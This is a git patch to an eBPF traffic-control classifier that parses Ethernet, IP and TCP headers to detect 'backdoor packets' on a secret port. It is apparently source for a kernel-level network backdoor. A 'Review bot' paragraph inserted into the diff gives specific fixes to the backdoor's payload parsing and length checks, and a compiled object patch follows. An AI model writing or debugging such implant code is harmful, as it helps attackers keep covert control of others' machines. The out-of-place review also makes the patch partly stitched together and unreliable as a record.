From 43ccb6cd3dd496bb6f681e5f92d5552bc14a9e8a Mon Sep 17 00:00:00 2001
From: h3xduck
Date: Wed, 13 Apr 2022 20:46:06 -0400
Subject: [PATCH] Added packet parsing and bound checking
---
src/ebpf/include/bpf/tc.c | 35 ++++++++++++++++++++++++++++++++---
src/tc.o | Bin 1120 -> 2624 bytes
2 files changed, 32 insertions(+), 3 deletions(-)
diff --git a/src/ebpf/include/bpf/tc.c b/src/ebpf/include/bpf/tc.c
index ece886f..8f3eca9 100644
--- a/src/ebpf/include/bpf/tc.c
+++ b/src/ebpf/include/bpf/tc.c
@@ -19,27 +19,56 @@ int classifier(struct __sk_buff *skb){ //We are interested on parsing TCP/IP packets so let's assume we have one //Ethernet header struct ethhdr *eth_hdr = data; + if ((void *)eth_hdr + sizeof(struct ethhdr) > data_end){ + bpf_printk("ETH\n"); + return TC_ACT_OK; + } if(eth_hdr->h_proto != htons(ETH_P_IP)){ //Not an IP packet + bpf_printk("IP\n"); return TC_ACT_OK; } //IP header - struct iphdr *ip_hdr = (struct iphdr*)data + sizeof(struct ethhdr); + struct iphdr *ip_hdr = (struct iphdr*)(data + sizeof(struct ethhdr)); + if ((void *)ip_hdr + sizeof(struct iphdr) > data_end){ + bpf_printk("IP CHECK, ip: %llx, data: %llx, datalen: %llx\n", ip_hdr, data, data_end); + return TC_ACT_OK; + } if(ip_hdr->protocol != IPPROTO_TCP){ + bpf_printk("TCP\n"); return TC_ACT_OK; } //TCP header - struct tcphdr *tcp_hdr = (struct tcphdr *)data + sizeof(struct ethhdr) + sizeof(struct iphdr); + struct tcphdr *tcp_hdr = (struct tcphdr *)(data + sizeof(struct ethhdr) + sizeof(struct iphdr)); + if ((void *)tcp_hdr + sizeof(struct tcphdr) > data_end){ + bpf_printk("TCP CHECK\n"); + return TC_ACT_OK; + } //We now proceed to scan for our backdoor packets - __u16 dest_port = ntohs(tcp_hdr->dest); if(dest_port != SECRET_PACKET_DEST_PORT){ + bpf_printk("PORT CHECK\n"); return TC_ACT_OK; } + //Mark skb buffer readable and writable + //bpf_skb_pull_data(skb, 0); + + __u32 payload_size = ntohs(ip_hdr->tot_len) - (tcp_hdr->doff * 4) - (ip_hdr->ihl * 4); + char* payload = (void *)(tcp_hdr + tcp_hdr->doff*4); + if ((void*)payload + payload_size > data_end){ + bpf_printk("PAYLOAD CHECK\n"); + return TC_ACT_OK; + } + + bpf_printk("PAYLOAD size: %u\n", payload_size); + + + + return TC_ACT_OK; 
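Review bot: The payload pointer in the last added block is computed as `tcp_hdr + tcp_hdr->doff*4`, which is arithmetic on a `struct tcphdr *` and therefore advances by `doff*4` whole TCP headers rather than bytes; this is the same scaling mistake the commit fixes for `ip_hdr` and `tcp_hdr` by parenthesising `data + ...`, and it should read `char *payload = (char *)tcp_hdr + tcp_hdr->doff * 4;`. `payload_size` is also derived from three wire-controlled fields (`tot_len`, `ihl`, `doff`) with no sanity check, so a packet whose `tot_len` is smaller than the two header lengths makes the `__u32` subtraction wrap to a huge value before the `data_end` comparison; reject such packets first, e.g. `if (ip_hdr->ihl < 5 || tcp_hdr->doff < 5 || ntohs(ip_hdr->tot_len) < ip_hdr->ihl * 4 + tcp_hdr->doff * 4) return TC_ACT_OK;`. The TCP header is located at a fixed `sizeof(struct iphdr)` offset while the size calculation uses `ihl * 4`, so the two disagree for any packet carrying IP options. classifier() begins before the hunk (the declarations of `data` and `data_end` are not visible here) and presumably closes after it.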
diff --git a/src/tc.o b/src/tc.o index d1d332078a4b97e67bc1fb84865103757cdddb76..54c02b5b055177bbe5f77f87d16971e20d749b6f 100644 GIT binary patch literal 2624 zcmbtWJ!}+56n^LPVOV~gP#9PN+60hL1cwa*1fe*5m>6*qD|Awl25Y@u!-?hRb`NAY zP-tinWg%(rnC;FN=ZS15J8k6Q9u%PkH)C*(aL7KL@?z0SU*1ZV$`6Noa?i0a#4}cI2vAritOH17RJ!7vz-@qKT+v^lf)(f3szp&ic zC@hT(3<(eWr+kO{*&k$;-2Qek&}%C@i0f;fE(C~5|I7A2=MY_V|IK)BR~(1# zqVUM`Owb9S6GxYicHMUwev}0TpWEYg3w4Q^2M)brUG{jbtH7aGtjj6is{@~$sGsgv zmwhbL>p+req^OB|Ua|CxrtM^t%ti(VrH;rWM(XBuYu0_ILVrm-J?SK_GuPn|%PmZ+ z`s8}gv;3Tvd=>l3_h7ru0rcDdT9z^Ut*GhImmFw-$j@_z0b#@RI`qn>lwh0-J z9rUx09q0D{*7mDVr4Gl%|J3ByF{Z;`0VQgsUkH7{{f*hy9l}yOLAP@aEj_b7Jf`Fp z0wtH{>7|vY7a5QIEQ{;-j}2HkbNmGN&&ua#m}T;~{>w(X8`?Qoa6k+5^G>jh&$yy zW515vBJ76GI=_@Lhfw-#u2sa3L*MyGo~j;E>E>BleQRwAJ+N6nOl16u3*vvqx4b?` z@0Z04mET0KOp9oq!niNn~pxenz`vQM>5 z0imh56-JlSh^k2xSECD4vq^9%qE1*1shW0@PB6{%#wF0k`1t755k(FwGIod+ub{ag zJXU31qz>w3O%G^R)BTzqvy}DzKbO?lz{lC-Z<_wzKeQZJ<&)nE!0^p2j#`l^%uQVk z1ULQkO}&h~{&`_on$`OIGek{ZX-Cr*o}D|5|IQTtZT<0z5*XEThM4#b-Ng%-+c`|M zz8$a8Gxl&D1GC$FZUz5#{Cing@_=K4M!f_CYJ z|NsBr0(6ipP^cA%*?@QpM4DkLke+;nMU%rlzy~Zexs+97@n5@Xr zFnJ-TJY&G*gB%hZPy=KqKje^~?7%6(^p|0B6sH{%2jk>foOYrcpxOkW>Okt*Ccov> V*06xeR6u1wTxKAKnJ57j2LM%FN6!EN